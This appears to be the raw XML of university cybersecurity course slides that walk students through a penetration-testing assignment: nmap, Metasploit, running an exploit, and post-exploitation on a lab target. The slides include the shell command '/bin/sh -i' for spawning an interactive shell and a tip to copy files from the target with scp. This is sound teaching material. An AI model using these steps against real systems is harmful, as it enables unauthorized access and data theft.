              <a:t>Type: “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –i”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313380-8029-4E31-8D41-8C1B24DF4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136" y="1143001"/>
            <a:ext cx="843586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14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5815A-CA3B-4CD0-909B-D79FFFDB2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1137B-B389-4503-91AF-910750994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752B34-1901-46E0-9AB1-C1ADD3974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6968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67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9AB3E-1B05-4AB7-851A-A9F8ED924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A1CD6-D025-407D-8111-146DAD918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cd /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E5C2FB-6ED3-440A-BD6D-960574E05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8180914" cy="1428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7A112F-05F2-473F-A8C9-4A5CEF9DF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173" y="0"/>
            <a:ext cx="363882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436B13-FC40-4579-B9EA-8B96462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233" y="5271982"/>
            <a:ext cx="4011262" cy="1187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6908CC-C095-4250-B77F-3724D54C5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2006" y="2936187"/>
            <a:ext cx="2012968" cy="778599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4BAFFD24-CEDA-497D-9C0C-D0013DCE7F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7714974" y="3218656"/>
            <a:ext cx="3029163" cy="42068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50359DB-FCA1-4506-B592-45E518B47ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7918496" y="5566463"/>
            <a:ext cx="1577930" cy="42068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4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F01DFE-0BEF-4FB6-A717-88DACB845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1" y="0"/>
            <a:ext cx="8372474" cy="67100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E0CBA9-7B05-4CAB-863E-C5870C3D13E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8724900" y="685800"/>
            <a:ext cx="3467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Which accounts might have data in them a hacker would be interested in?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2847877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63D528-50F9-43FA-95E1-9D2E2E366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976"/>
            <a:ext cx="8984946" cy="630887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F398665-7A3B-4C7C-AFA9-D96DF1BFD06A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078686" y="1825625"/>
            <a:ext cx="2617238" cy="1001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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What does this information represent?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149826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1228F-FD9E-47D9-8FCC-AA63E0DE5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2F25B-F027-4365-940F-BF5B17DB1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4" y="5553075"/>
            <a:ext cx="11153775" cy="1137443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checkout command “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” for moving files from target back to your Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…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DE73D2-FB79-4745-AC2F-66CC04A7E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79" y="1068388"/>
            <a:ext cx="11264241" cy="41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74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7EF49-21A0-439A-A679-DEF46CCCA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Some thoughts on how to approach Milestone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33541-E1C2-4AB1-8C9B-67784C1CA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7011"/>
            <a:ext cx="10515600" cy="50299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Penetration testing involves experimentation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3F9C96-255E-451A-84F1-5F884D5FF646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072701" y="1864713"/>
            <a:ext cx="54550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Basic Penetration Testing Workflow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2E3BAAA-B9A9-4EC1-B6BC-21EBE864F638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961147" y="2537539"/>
            <a:ext cx="5330125" cy="3750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Pre-engagement Interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Intelligence Gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Threat Modeling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Post Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1C8E6D72-4319-411B-8156-DE05F561DAD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1557283" y="4225042"/>
            <a:ext cx="449179" cy="58031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rrow: Curved Left 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D1E5E6-254D-461E-A86C-33F2943045BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="183119">
            <a:off x="5525422" y="4311010"/>
            <a:ext cx="449179" cy="58031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540047-764D-4708-8AF7-2C0E3DAA4AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6031968" y="4330531"/>
            <a:ext cx="2630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Iterative experimentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388659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52F97-1D4D-42E8-A671-6CB8FAB8E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63D1A-0528-45A2-B42C-1BDA86C89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5900"/>
            <a:ext cx="10515600" cy="46910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Some thoughts on how to approach Milestone 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2458858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F80E1-E41D-4AF0-9012-E3EEA361F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BF672-66E9-46E8-A652-1903BB96A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B651C-C2D9-48D9-AB6E-E405F80AB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55636" cy="639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49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9EA55-FCC6-4715-8509-C612DB306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33152-64AB-4FCE-832E-2E18E6DBC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70101-5DB3-4849-A6FC-A4B46DCC0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05" y="570270"/>
            <a:ext cx="10378729" cy="6189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E366A6-F62E-B286-2912-B02464F472D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3264310" y="455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https://security-assignments.com/projects/pen-test.html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091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EF08E-175D-4E12-AE55-A73A8D47E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1BB88-14DC-4240-A662-0C0B13559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A166BB-F6B0-4A0E-A369-4A614E158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58" y="121920"/>
            <a:ext cx="9050937" cy="52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74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29AC0-CF92-466A-BEBC-31BF1DAA5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BE8F4-22B5-473A-A52F-ECC7B032B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44A60-4082-42A0-B19B-57F6C0B63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12"/>
            <a:ext cx="10459202" cy="639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64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D1A1F-29AC-4423-A7EB-188C69C45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37B6C-BBAA-4561-A174-67AF28B5B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36B326-142C-49E8-9192-901C5BE80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144"/>
            <a:ext cx="12267735" cy="625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96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05B58-2A55-4B73-B7ED-CED3F7D89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8D736-EF06-4EA8-8847-287D8B54A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12EC5E-977B-4F34-AD80-AB12DD977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74"/>
            <a:ext cx="11688342" cy="3457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1D5382-6A24-4224-B0C8-8FE628DD1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52" y="3517083"/>
            <a:ext cx="6732595" cy="2797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F57C40-A228-4BD8-8C93-93888E202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7207" y="3562349"/>
            <a:ext cx="4875243" cy="1250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1C2A8D-BEBF-477A-A25C-AA6332C1D7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7206" y="4947813"/>
            <a:ext cx="5069111" cy="104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2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1911</TotalTime>
  <Words>328</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>54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Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Managing Enterprise Cybersecurity MIS 4596</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Some thoughts on how to approach Milestone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Milestone 3 Assignment</vt:lpstr>
      <vt:lpstr>Remember nmap? It can help you determine what services are  running?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Remember nmap? It can help you determine what services are  running?</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Steps to perform the exploit:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>We obtained a “Jail shell”</vt:lpstr>
      <vt:lpstr>Spawning a TTY (“teletype” terminal) shell</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Next steps</vt:lpstr>
      <vt:lpstr>Agenda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Systems Integration MIS 4596</dc:title>
  <dc:creator>David Lanter</dc:creator>
  <cp:lastModifiedBy>Darin Bartholomew</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-16T22:53:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-22T17:57:34Z</dcterms:modified>
</cp:coreProperties>
</file>